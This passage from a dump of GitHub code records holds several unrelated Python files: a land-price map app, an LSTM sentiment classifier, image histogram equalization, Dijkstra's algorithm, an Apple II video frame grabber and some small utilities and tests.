bokeh.plotting import figure, output_notebook, show\r\nfrom bokeh.models.mappers import LogColorMapper\r\nfrom bokeh.palettes import RdYlGn10 as palette\r\nfrom bokeh.models import ColumnDataSource,HoverTool, Select\r\nfrom bokeh.transform import transform\r\nfrom bokeh.layouts import column\r\nfrom bokeh.models import CustomJS, Select\r\nfrom bokeh.models import ColorBar\r\n\r\n\r\n#tile_provider = get_provider(Vendors.OSM)\r\n\r\nst.title(\"_:blue[Land Prices]_ :moneybag: :cityscape:\")\r\n\r\nst.subheader(\"The app you need! 
:sunglasses:\")\r\n\r\n\r\n# No need to change the functions from the quick start\r\ndef getPolyCoords(row, geom, coord_type):\r\n \r\n if row[geom].geom_type == \"MultiPolygon\":\r\n g_obj = row[geom].geoms[0]\r\n else:\r\n g_obj = row[geom] \r\n if coord_type == 'x':\r\n return list(g_obj.exterior.coords.xy[0])\r\n elif coord_type == 'y':\r\n return list(g_obj.exterior.coords.xy[1])\r\n\r\ndef transform_gdf(gdf):\r\n \r\n gdf['x'] = gdf.apply(getPolyCoords, geom = 'geometry', coord_type = 'x', axis = 1)\r\n gdf['y'] = gdf.apply(getPolyCoords, geom = 'geometry', coord_type = 'y', axis = 1)\r\n p_df = gdf.drop('geometry', axis = 1).copy()\r\n \r\n return p_df\r\n\r\n# Settings\r\ncities = [\"Berlin\", \"Bremen\" ,\"Dresden\", \"Frankfurt_am_Main\", \"Köln\"]\r\n\r\n\r\n# Enable notebook output\r\noutput_notebook()\r\n\r\n# Neighborhood is built inside the loop.\r\nneighborhood = gpd.GeoDataFrame()\r\nranges = {}\r\n\r\n# THIS NEEDS TO BE 3857 and not what was in the example notebook (3395). Otherwise Frankfurt is in Darmstadt :/\r\nmercator_crs = CRS.from_user_input(3857)\r\n\r\nmerged_cities = pd.read_csv(f\"../data/interim/nb_level_merged_all_cities_with_amenties.csv\")\r\n\r\nfor city in cities:\r\n\r\n neighborhoods_in_city = gpd.read_file(f\"../data/raw/3 Neighborhoods/Neighborhoods_{city}.gpkg\")\r\n\r\n land_prices = pd.read_csv(f\"../data/raw/1 Land Prices/Land_Prices_Neighborhood_{city}.csv\", sep = \";\")\r\n\r\n neighborhoods_in_city = pd.merge(neighborhoods_in_city, land_prices, on='Neighborhood_FID', how='left')\r\n\r\n all_city_data = merged_cities.query(\"City_Name == @city\")\r\n\r\n neighborhoods_in_city = pd.merge(neighborhoods_in_city, all_city_data, on='Neighborhood_Name', how='left', suffixes=(\"\", \"_\")) \r\n\r\n neighborhoods_in_city[\"Land_Value\"] = neighborhoods_in_city[\"Land_Value\"].round(0)\r\n\r\n\r\n neighborhood = pd.concat([neighborhood, neighborhoods_in_city])\r\n\r\n ranges[city] = {\r\n \"x\": (neighborhoods_in_city.to_crs(mercator_crs).total_bounds[0], neighborhoods_in_city.to_crs(mercator_crs).total_bounds[2]),\r\n \"y\": (neighborhoods_in_city.to_crs(mercator_crs).total_bounds[1], neighborhoods_in_city.to_crs(mercator_crs).total_bounds[3])\r\n } \r\n\r\nneighborhood_mercator = neighborhood.to_crs(mercator_crs)\r\nneighborhood_b = transform_gdf(neighborhood_mercator)\r\n\r\nx_range = ranges[cities[0]][\"x\"]\r\ny_range = ranges[cities[0]][\"y\"]\r\nmapper = LogColorMapper(palette = palette)\r\n\r\n\r\np = figure(title = f\"Neighborhoods in {cities[0]}\", x_range=x_range, y_range=y_range,\r\n x_axis_type=\"mercator\", y_axis_type=\"mercator\", match_aspect=False)\r\n \r\np.patches('x', 'y', source = ColumnDataSource(neighborhood_b), line_color = \"grey\", line_width = 0.8,\r\n fill_color= transform('Land_Value',mapper),\r\n fill_alpha = 0.7)\r\n\r\ncb = ColorBar (color_mapper = mapper, location = (5,6))\r\np.add_layout(cb, 'right')\r\n#p.add_tile(tile_provider)\r\n\r\nTOOLTIPS = [\r\n (\"Neighborhood\", \"@Neighborhood_Name\"),\r\n (\"Land Value\", \"@Land_Value €/m2\"),\r\n (\"Area count\", \"@Area_Count\"),\r\n (\"Living area below 30 sqm\", \"@w_less_30\"),\r\n (\"Restaurants\", \"@restaurant\"),\r\n (\"Fountains\", \"@fountain\")\r\n \r\n]\r\n\r\np.add_tools(HoverTool(tooltips=TOOLTIPS))\r\n\r\ncallback = CustomJS(\r\n args = dict(xr = p.x_range, yr = p.y_range, locations = ranges, title = p.title),\r\n code = \"\"\"\r\n\r\n var select_vals = cb_obj.value;\r\n\r\n title.text = `Neighborhoods in ${select_vals}`;\r\n\r\n xr.start = 
locations[select_vals][\"x\"][0];\r\n xr.end = locations[select_vals][\"x\"][1];\r\n yr.start = locations[select_vals][\"y\"][0];\r\n yr.end = locations[select_vals][\"y\"][1];\r\n\"\"\")\r\n\r\nselect = Select(title=\"Select city:\", value=cities[0], options=cities)\r\nselect.js_on_change(\"value\", callback)\r\n\r\nlayout = column(select , p)\r\nshow(layout)\r\n\r\nst.markdown(\"**Land prices in ...**\")\r\nst.bokeh_chart(layout, use_container_width=True)\r\n\r\n\r\nst.markdown(\"**What should you care to sell your property for higher prices?**\")\r\n\r\n\r\n\r\nfrom bokeh.plotting import figure\r\nfrom bokeh.models import ColumnDataSource\r\nfrom bokeh.palettes import Spectral10\r\nfrom bokeh.transform import factor_cmap\r\nfrom bokeh.io import show\r\nimport streamlit as st\r\n\r\nfeatures = ['Living space less than 30 sqm', 'Restaurants', 'Fountains', 'Benchs', 'Unusual apartment type', 'Holding German and other pass', 'Greek', 'EU27 pass', 'Waste bin', 'Cafe']\r\ncounts = [178, 124, 102, 81, 76, 76, 75, 74, 70, 68]\r\n\r\nsource = ColumnDataSource(data=dict(features=features, counts=counts, color=Spectral10))\r\n\r\n# sorting the bars means sorting the range factors\r\nsorted_features = sorted(features, key=lambda x: counts[features.index(x)], reverse=False)\r\n\r\n\r\nfeature_chart = figure(y_range=sorted_features, plot_height=350, plot_width=600, title=\"Most Important Features\",\r\n toolbar_location=None, tools=\"\")\r\n\r\nfeature_chart.hbar(y='features', right='counts', height=0.8, source=source, \r\n color=factor_cmap('features', palette=Spectral10, factors=sorted_features))\r\n\r\nfeature_chart.xgrid.grid_line_color = None\r\nfeature_chart.yaxis.major_label_text_font_size = \"12pt\"\r\nfeature_chart.axis.axis_line_color = None\r\nfeature_chart.outline_line_color = None\r\n\r\nst.bokeh_chart(feature_chart)","repo_name":"bozturk10/ifohack-landers-group","sub_path":"notebooks/streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20852179152","text":"\ndef search(list,n):\n\n\tfor i in range(len(list)):\n\t\tif list[i] == n:\n\t\t\treturn True\n\treturn False\n\n# list \nlist = [1, 2, 'apple', 4,'Grapes', 6]\n\n# Driver Code\nn = 'Grapes'\n\nif search(list, n):\n\tprint(\"Found\")\nelse:\n\tprint(\"Not Found\")\n","repo_name":"Shubhamrawat5/open-source-contribution","sub_path":"PYTHON/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"48"} +{"seq_id":"8162442949","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\nimport matplotlib.pyplot as plt\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM, SpatialDropout1D\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils.np_utils import to_categorical\nimport re\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\ndata = pd.read_csv('Comments.csv')\n# Keeping only the neccessary columns\ndata = data[['comment','label','language']]\n\ndata = data[data.label != \"neutral\"]\ndata['comment'] = data['comment'].apply(lambda x: x.lower())\ndata['comment'] = data['comment'].apply((lambda x: re.sub('[^a-zA-z0-9\\s]','',x)))\n\nprint(data[ data['label'] == 'positive'].size)\nprint(data[ data['label'] == 'negative'].size)\n\nfor idx,row in data.iterrows():\n row[0] = row[0].replace('rt',' ')\n \nmax_fatures = 2000\ntokenizer = Tokenizer(num_words=max_fatures, split=' ')\ntokenizer.fit_on_texts(data['comment'].values)\nX = tokenizer.texts_to_sequences(data['comment'].values)\nX = pad_sequences(X)\n\nembed_dim = 128\nlstm_out = 196\n\nmodel = Sequential()\nmodel.add(Embedding(max_fatures, embed_dim,input_length = X.shape[1]))\nmodel.add(SpatialDropout1D(0.4))\nmodel.add(LSTM(lstm_out, dropout=0.2, recurrent_dropout=0.2))\nmodel.add(Dense(2,activation='softmax'))\nmodel.compile(loss = 'categorical_crossentropy', optimizer='adam',metrics = ['accuracy'])\nprint(model.summary())\n\nY = pd.get_dummies(data['label']).values\nX_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size = 0.33, random_state = 42)\nprint(X_train.shape,Y_train.shape)\nprint(X_test.shape,Y_test.shape)\n\nbatch_size = 32\nhistory = model.fit(X_train, Y_train, epochs = 15, batch_size=batch_size, verbose = 1, validation_split=0.2)\n\ndef generate_graph(history):\n plt.plot(history.history['accuracy'], 'b')\n plt.plot(history.history['val_accuracy'], 'r')\n plt.title('Model Accuracy'),\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.show()\n\ngenerate_graph(history)\n\nvalidation_size = 1500\n\nX_validate = X_test[-validation_size:]\nY_validate = Y_test[-validation_size:]\nX_test = X_test[:-validation_size]\nY_test = Y_test[:-validation_size]\n# score,acc = model.evaluate(X_test, Y_test, verbose = 2, batch_size = 2)\n# print(\"score: %.2f\" % (score))\n# print(\"acc: %.2f\" % (acc))\n\npos_cnt, neg_cnt, pos_correct, neg_correct = 0, 0, 0, 0\nfor x in range(len(X_validate)):\n \n result = model.predict(X_validate[x].reshape(1,X_test.shape[1]),batch_size=1,verbose = 2)[0]\n \n if np.argmax(result) == np.argmax(Y_validate[x]):\n if np.argmax(Y_validate[x]) == 0:\n neg_correct += 1\n else:\n pos_correct += 1\n \n if np.argmax(Y_validate[x]) == 0:\n neg_cnt += 1\n else:\n pos_cnt += 1\n\n\n\nprint(\"pos_acc\", pos_correct/pos_cnt*100, \"%\")\nprint(\"neg_acc\", neg_correct/neg_cnt*100, \"%\")\n\ntwt = \"bati kaayo siya pagka maestra kay dili mutudlo ug tarong\"\n#vectorizing the tweet by the pre-fitted tokenizer instance\ntwt = tokenizer.texts_to_sequences(twt)\n#padding the tweet to have exactly the same shape as `embedding_2` input\ntwt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\nprint(twt)\nsentiment = model.predict(twt,batch_size=1,verbose = 
2)[0]\nif(np.argmax(sentiment) == 0):\n print(\"negative\")\nelif (np.argmax(sentiment) == 1):\n print(\"positive\")\n\nlist_data = data.values.tolist()\n#function to get how many items in the dataset will be classified correctly\ndef getAccuracy():\n correct = 0\n miss = 0\n output = \"\"\n for entry in list_data:\n #vectorizing the tweet by the pre-fitted tokenizer instance\n twt = tokenizer.texts_to_sequences(entry[0])\n #padding the tweet to have exactly the same shape as `embedding_2` input\n twt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\n sentiment = model.predict(twt,batch_size=1)[0]\n if(np.argmax(sentiment) == 0):\n output = \"negative\"\n elif (np.argmax(sentiment) == 1):\n output = \"positive\"\n if(output == entry[1]):\n correct += 1\n else:\n miss += 1\n \n print(\"accuracy: \", correct/len(data['comment']))\n print(\"miss\", miss/len(data['comment']))\n print(\"correct: \", correct)\n print(\"miss\", miss)\n#get the cebuano, english prediction accuracy\ndef getLanguageAccuracy():\n #Count the number of cebuano and english comments\n countCebuano= sum(p[2] ==\"cebuano\" for p in list_data)\n countEnglish = sum(p[2] ==\"english\" for p in list_data)\n \n print(\"cebuano = \", countCebuano)\n print(\"english = \", countEnglish)\n\n ceb_correct = 0\n eng_correct = 0\n miss = 0\n\n for entry in list_data:\n #vectorizing the tweet by the pre-fitted tokenizer instance\n twt = tokenizer.texts_to_sequences(entry[0])\n #padding the tweet to have exactly the same shape as `embedding_2` input\n twt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\n sentiment = model.predict(twt,batch_size=1)[0]\n if(np.argmax(sentiment) == 0):\n output = \"negative\"\n elif (np.argmax(sentiment) == 1):\n output = \"positive\"\n if(output == entry[1]):\n if(entry[2] == \"cebuano\"):\n ceb_correct += 1\n else:\n eng_correct += 1\n else:\n miss += 1\n\n #print accuracy of cebuano,english guess\n print(\"cebuano accuracy: \", ceb_correct/countCebuano)\n print(\"english accuracy: \", eng_correct/countEnglish)\n\n #print the number of correct guess\n print(\"cebuano \", countCebuano, \" correct cebuano guess \", ceb_correct)\n print(\"english \", countEnglish, \" correct english guess \", eng_correct)\n\n#get the pos,neg,ney accuracy\ndef getPosNegNeuAccuracy():\n #get how many pos,neg,and neutral in the dataset\n list_data = data.values.tolist()\n #Count the data by label\n countPositives = sum(p[1] ==\"positive\" for p in list_data)\n countNegatives = sum(p[1] ==\"negative\" for p in list_data)\n countNeutral = sum(p[1] ==\"neutral\" for p in list_data)\n\n pos_correct = 0\n neg_correct = 0\n neu_correct = 0\n miss = 0\n for entry in list_data:\n #vectorizing the tweet by the pre-fitted tokenizer instance\n twt = tokenizer.texts_to_sequences(entry[0])\n #padding the tweet to have exactly the same shape as `embedding_2` input\n twt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\n sentiment = model.predict(twt,batch_size=1)[0]\n if(np.argmax(sentiment) == 0):\n output = \"negative\"\n elif (np.argmax(sentiment) == 1):\n output = \"positive\"\n if(output == entry[1]):\n if(entry[1] == \"positive\"):\n pos_correct += 1\n elif(entry[1] == \"negative\"):\n neg_correct += 1\n else:\n neu_correct += 1\n else:\n miss += 1\n\n #print accuracy of pos,neg,neu guess\n print(\"positive accuracy: \", pos_correct/countPositives)\n print(\"negative accuracy: \", neg_correct/countNegatives)\n print(\"neutral accuracy: \", neu_correct/countNeutral)\n\n #print the number of correct guess\n 
print(\"positive \", countPositives, \" correct pos guess \", pos_correct)\n print(\"negative \", countNegatives, \" correct neg guess \", neg_correct)\n print(\"neutral \", countNeutral, \" correct neu guess \", neu_correct)\n\ngetAccuracy()\ngetLanguageAccuracy()\ngetPosNegNeuAccuracy()","repo_name":"namocbryan11/Capstone-Project","sub_path":"Backend/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71325639827","text":"#! /usr/bin/env python\n\nimport sys\nimport optparse\nimport Bio\nfrom Bio import AlignIO\n\nparser = optparse.OptionParser()\n\nparser.add_option('-f', '--fasta_file', action=\"store\", dest=\"fastaIn\", type=\"string\")\n\n(options, args) = parser.parse_args()\nnamefile = options.fastaIn\nfp = open(namefile)\n\nalign = AlignIO.read(namefile, \"fasta\")\noutal = align[:,0:0]\n\nfor i in range(0, len(align[0])):\n if \"N\" not in align[:, i]:\n outal=outal+align[:, i:i+1]\n\nfor record in outal:\n print(\">\"+record.id)\n print(record.seq)\n\n\n\n\n","repo_name":"benoitnabholz/popgen_python","sub_path":"cleanAlignment.py","file_name":"cleanAlignment.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44302097991","text":"from turtle import Turtle\nSTARTING_POSITION = (0, -280)\nMOVE_DISTANCE = 10\nFINISH_LINE = 280\nALIGNMENT = \"center\"\nFONT = (\"Courier\", 24, \"normal\")\n\nclass Player(Turtle):\n def __init__(self):\n super().__init__()\n self.shape(\"turtle\")\n self.color(\"black\")\n self.penup()\n self.setheading(90)\n self.goto(STARTING_POSITION)\n\n def up(self):\n y_coordinate = self.ycor() + MOVE_DISTANCE\n self.goto(self.xcor(), y_coordinate)\n\n def down(self):\n y_coordinate = self.ycor() - MOVE_DISTANCE\n self.goto(self.xcor() , y_coordinate)\n\n def go_right(self):\n x_coordinate = self.xcor() + MOVE_DISTANCE\n self.goto(x_coordinate, self.ycor())\n\n def go_left(self):\n x_coordinate = self.xcor() - MOVE_DISTANCE\n self.goto(x_coordinate, self.ycor())\n\n def game_over(self):\n self.goto(0, 0)\n self.color(\"red\")\n self.write(\"GAME OVER\", align=ALIGNMENT, font=FONT)\n","repo_name":"abrahamanderson19972020/Turtle-Crossing-Game","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"588745323","text":"import glob \nimport numpy as np\nimport re\nimport preprocessor as p\n#http://www.aaai.org/ocs/index.php/ICWSM/ICWSM11/paper/viewFile/2886/3262\n# for name in glob.glob('tweet_log/*'): # gets the filenames of the data text files\n#\tprint name\n\nfilenames = glob.glob('tweet_log/*')\n\npredata = []\ntextdata = []\ncleaningdata = []\ntestdata = []\nfor ele in filenames:\n\twith open(ele) as reading:\n\t\tfor line in reading:\n\t\t\tarray = line.split(\",\")\n\t\t\tfor word in array:\n\t\t\t\tif word.startswith('\"text\":\"'):\n\t\t\t\t\t#print(word)\n\t\t\t\t\tpredata.append(word)\n\nfor indata in predata:\n\ttextdata.append(indata[8:-1])\n\nfor hellodata in range(0,len(textdata)):\n\t#print(textdata[hellodata])\n\ttempphrase = re.sub(r'[^\\x00-\\x7F]',' ', textdata[hellodata])\n\tnewphrase = re.sub(r'#',' ', tempphrase)\n\tcleaningdata.append(newphrase)\n\np.set_options(p.OPT.URL, p.OPT.EMOJI, p.OPT.MENTION,p.OPT.RESERVED,p.OPT.SMILEY)\nfor pro in 
range(0,len(cleaningdata)):\n\ttestdata.append(p.clean(cleaningdata[pro]))\n\t\n#for testing in range(0,len(testdata)):\n\t#print testdata[testing]\n\n#testdata is the final output\n","repo_name":"archiekey/AuroraBorealis","sub_path":"preprocesstest.py","file_name":"preprocesstest.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21189322236","text":"\"\"\"Time utilities\"\"\"\nfrom datetime import date, timedelta\nimport math\n\n\ndef quarter_to_daterange(quarter):\n \"\"\"Convert a quarter in arbitrary filename-ready format (e.g. 2015Q1)\n into start and end datetimes\"\"\"\n assert len(quarter) == 6\n year = int(quarter[0:4])\n quarter = quarter[5]\n MONTH_DAY = {\n '1': ((1, 1), (3, 31)),\n '2': ((4, 1), (6, 30)),\n '3': ((7, 1), (9, 30)),\n '4': ((10, 1), (12, 31))\n }\n md = MONTH_DAY[quarter]\n start_md, end_md = md\n return (\n date(year, *start_md),\n date(year, *end_md)\n )\n\n\ndef datetime_to_year_quarter(dt):\n \"\"\"\n Args:\n dt: a datetime\n Returns:\n tuple of the datetime's year and quarter\n \"\"\"\n year = dt.year\n quarter = int(math.ceil(float(dt.month)/3))\n return (year, quarter)\n\n\ndef datetime_to_quarter(dt):\n \"\"\"\n Args:\n dt: a datetime\n Returns:\n the datetime's quarter in string format (2015Q1)\n \"\"\"\n year, quarter = datetime_to_year_quarter(dt)\n return '{}Q{}'.format(year, quarter)\n\n\ndef overlaps(start_one, end_one, start_two, end_two):\n return start_one <= end_two and start_two <= end_one\n\n\ndef dates_in_range(start_date, end_date):\n \"\"\"Returns all dates between two dates.\n\n Inclusive of the start date but not the end date.\n\n Args:\n start_date (datetime.date)\n end_date (datetime.date)\n\n Returns:\n (list) of datetime.date objects\n \"\"\"\n return [\n start_date + timedelta(n)\n for n in range(int((end_date - start_date).days))\n ]\n","repo_name":"workforce-data-initiative/skills-utils","sub_path":"skills_utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13771846145","text":"from PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\n\n\n#this function is for histogram equalization\ndef histeq(image_array,image_bins=256):\n\n\n\n image_array2,bins = np.histogram(image_array.flatten(),image_bins)\n #print image_array2,bins\n # Calculate the cumulative histogram function\n cdf = image_array2.cumsum()\n\n # The cumulative function was transformed into the interval [ 0,255 ]\n cdf = (255.0/cdf[-1])*cdf\n\n # Original image matrix using integrated conversion function , interpolation process\n image2_array = np.interp(image_array.flatten(),bins[:-1],cdf)\n\n\n # Returns the image matrix leveled and cumulative function\n return image2_array.reshape(image_array.shape),cdf\n\n\n#open the image and convert it to grayscale\nimage = Image.open(\"image.jpg\").convert(\"L\")\n\n#Object into an image matrix\nimage_array = np.array(image)\n\n#print grayscale image and its histogram\nplt.subplot(2,2,1)\nplt.imshow(image,cmap=cm.gray)\nplt.axis(\"off\")\nplt.subplot(2,2,2)\nplt.hist(image_array.flatten(),256) #flatten:Matrix can be converted into one-dimensional sequence\n\na = histeq(image_array) # histogram 
equalization\nplt.subplot(2,2,3)\nplt.hist(a[0].flatten(),256)\nplt.subplot(2,2,4)\nplt.imshow(Image.fromarray(a[0]),cmap=cm.gray)\nplt.axis(\"off\")\n\nplt.show()\n","repo_name":"littlewindcc/Image-Processing","sub_path":"histogram equalization/histogram equalization.py","file_name":"histogram equalization.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11714009747","text":"import click\nfrom elements.jsonreader import JsonReader\nfrom elements.freqcounter import FreqCounter\nfrom elements.stopword import StopwordElement\nfrom elements.lowercaser import LowerCaser\nfrom elements.summary import SummaryElement\nfrom elements.porterstemmer import PorterStemmerElement\nimport pickle\nimport sys\n\n@click.command()\n@click.argument('input', type=click.File('r'))\n@click.option('--docspath', type=click.File('wb'),\n        default='data/parsed-docs.pkl')\n@click.option('--metapath', type=click.File('wb'),\n        default='data/doc-meta.pkl')\ndef cli(input, docspath, metapath):\n    \"\"\"Parse documents for word vectors and save.\"\"\"\n    doc_itr = JsonReader(input)\n    with click.progressbar(doc_itr) as prog_doc_itr:\n        freq_itr = FreqCounter(prog_doc_itr, 'text')\n        lowr_itr = LowerCaser(freq_itr)\n        stop_itr = StopwordElement(lowr_itr, ['a', 'an', 'the'])\n        stem_itr = PorterStemmerElement(stop_itr)\n        sumr_itr = SummaryElement(stem_itr)\n        docs = list(sumr_itr)\n        meta = {\n            'docFreq': sumr_itr.DF(),\n            'docCount': sumr_itr.N,\n            'avgLength': sumr_itr.averageLength()\n        }\n    pickle.dump(docs, docspath)\n    pickle.dump(meta, metapath)\n","repo_name":"joshterrell805-historic/CPE466-KDD","sub_path":"lab2/scripts/parse_docs.py","file_name":"parse_docs.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33266327324","text":"\"\"\"\nBaekjoon 1753 Shortest Path\nDifficulty: Gold 5\nType: Dijkstra\n\"\"\"\nimport heapq\n\n# Dijkstra's algorithm\ndef dijkstra(start):\n    # Initialize the distance of the start vertex to 0\n    distances[start] = 0\n    \n    # Create the queue that will hold the vertices\n    queue = []\n\n    # Push the start vertex and its distance onto the min-heap\n    heapq.heappush(queue, (0, start))\n\n    while queue:\n        current_distance, current_node = heapq.heappop(queue)\n\n        # Skip if the stored distance is already smaller than the popped one\n        if distances[current_node] < current_distance:\n            continue\n\n        # adjacent node, edge weight\n        for adjacent, weight in graph[current_node]:\n            distance = current_distance + weight\n\n            # Update when a shorter distance is found\n            if distance < distances[adjacent]:\n                distances[adjacent] = distance\n                heapq.heappush(queue, (distance, adjacent))\n\n# V: number of vertices, E: number of edges\nV, E = map(int, input().split())\n# K: number of the start vertex\nK = int(input())\n\ngraph = [[] for _ in range(V+1)]\ndistances = [float('inf')] * (V+1)\n\nfor _ in range(E):\n    # u: vertex, v: vertex, w: edge weight\n    u, v, w = map(int, input().split())\n    graph[u].append((v, w))\n\ndijkstra(K)\n\nfor i in distances[1:]:\n    if i == float('inf'):\n        print(\"INF\")\n    else:\n        print(i)\n","repo_name":"noitrighthere/Python-Algorithm","sub_path":"백준/백준_1753_최단경로.py","file_name":"백준_1753_최단경로.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40299170920","text":"\"\"\"Extracts sequence of still images from input video stream.\"\"\"\n\nimport os\nimport queue\nimport subprocess\nimport threading\nfrom typing import Iterator\n\nimport numpy as np\nimport skvideo.io\nfrom PIL import Image\n\nimport screen\nfrom palette import Palette\nfrom video_mode import 
VideoMode\n\n\nclass FrameGrabber:\n def __init__(self, mode: VideoMode):\n self.video_mode = mode\n self.input_frame_rate = 30\n\n def frames(self) -> Iterator[screen.MemoryMap]:\n raise NotImplementedError\n\n\nclass FileFrameGrabber(FrameGrabber):\n def __init__(self, filename, mode: VideoMode, palette: Palette):\n super(FileFrameGrabber, self).__init__(mode)\n\n self.filename = filename # type: str\n self.palette = palette # type: Palette\n self._reader = skvideo.io.FFmpegReader(filename)\n\n # Compute frame rate from input video\n # TODO: possible to compute time offset for each frame instead?\n data = skvideo.io.ffprobe(self.filename)['video']\n rate_data = data['@r_frame_rate'].split(\"/\") # e.g. 12000/1001\n self.input_frame_rate = float(\n rate_data[0]) / float(rate_data[1]) # type: float\n\n def _frame_grabber(self) -> Iterator[Image.Image]:\n for frame_array in self._reader.nextFrame():\n yield Image.fromarray(frame_array)\n\n @staticmethod\n def _output_dir(filename, video_mode, palette) -> str:\n return \"%s/%s/%s\" % (\n \".\".join(filename.split(\".\")[:-1]),\n video_mode.name,\n palette.name)\n\n def _palette_arg(self) -> str:\n return \"P%d\" % self.palette.value\n\n def frames(self) -> Iterator[screen.MemoryMap]:\n \"\"\"Encode frame to (D)HGR using bmp2dhr.\n\n We do the encoding in a background thread to parallelize.\n \"\"\"\n\n frame_dir = self._output_dir(\n self.filename, self.video_mode, self.palette)\n os.makedirs(frame_dir, exist_ok=True)\n\n q = queue.Queue(maxsize=10)\n\n def _hgr_decode(_idx, _frame):\n outfile = \"%s/%08dC.BIN\" % (frame_dir, _idx)\n bmpfile = \"%s/%08d.bmp\" % (frame_dir, _idx)\n\n try:\n os.stat(outfile)\n except FileNotFoundError:\n _frame = _frame.resize((280, 192), resample=Image.LANCZOS)\n _frame.save(bmpfile)\n\n subprocess.call([\n \"/usr/local/bin/bmp2dhr\", bmpfile, \"hgr\",\n self._palette_arg(),\n \"D9\" # Buckels dither\n ])\n\n os.remove(bmpfile)\n\n _main = np.fromfile(outfile, dtype=np.uint8)\n\n return _main, None\n\n def _dhgr_decode(_idx, _frame):\n mainfile = \"%s/%08d.BIN\" % (frame_dir, _idx)\n auxfile = \"%s/%08d.AUX\" % (frame_dir, _idx)\n\n bmpfile = \"%s/%08d.bmp\" % (frame_dir, _idx)\n\n try:\n os.stat(mainfile)\n os.stat(auxfile)\n except FileNotFoundError:\n _frame = _frame.resize((280, 192), resample=Image.LANCZOS)\n _frame.save(bmpfile)\n\n subprocess.call([\n \"/usr/local/bin/bmp2dhr\", bmpfile, \"dhgr\", # \"v\",\n self._palette_arg(),\n \"A\", # Output separate .BIN and .AUX files\n \"D9\" # Buckels dither\n ])\n\n os.remove(bmpfile)\n\n _main = np.fromfile(mainfile, dtype=np.uint8)\n _aux = np.fromfile(auxfile, dtype=np.uint8)\n\n return _main, _aux\n\n def worker():\n \"\"\"Invoke bmp2dhr to encode input image frames and push to queue.\"\"\"\n\n decode = (\n _dhgr_decode if self.video_mode == VideoMode.DHGR else\n _hgr_decode\n )\n for _idx, _frame in enumerate(self._frame_grabber()):\n q.put(decode(_idx, _frame))\n\n q.put((None, None))\n\n t = threading.Thread(target=worker, daemon=True)\n t.start()\n\n while True:\n main, aux = q.get()\n if main is None:\n break\n\n main_map = screen.FlatMemoryMap(\n screen_page=1, data=main).to_memory_map()\n if aux is None:\n aux_map = None\n else:\n aux_map = screen.FlatMemoryMap(\n screen_page=1, data=aux).to_memory_map()\n yield (main_map, aux_map)\n q.task_done()\n\n 
t.join()\n","repo_name":"KrisKennaway/ii-vision","sub_path":"transcoder/frame_grabber.py","file_name":"frame_grabber.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"14642561492","text":"import math\n\nfrom simple_playgrounds.engine import Engine\nfrom simple_playgrounds.playground.layouts import SingleRoom\nfrom simple_playgrounds.element.elements.teleport import InvisibleBeam, VisibleBeamHoming, Portal, PortalColor\nfrom simple_playgrounds.common.position_utils import CoordinateSampler\n\nfrom simple_playgrounds.element.elements.basic import Physical\n\n\ndef test_beam(base_forward_interactive_agent_external):\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n beam = InvisibleBeam(destination=((50, 50), 0))\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while engine.game_on:\n\n engine.step(actions)\n\n assert agent.position[1] == 50\n\n engine.terminate()\n\n\ndef test_beam_orientation(base_forward_interactive_agent_external):\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n beam = InvisibleBeam(destination=((50, 50), math.pi/2))\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, 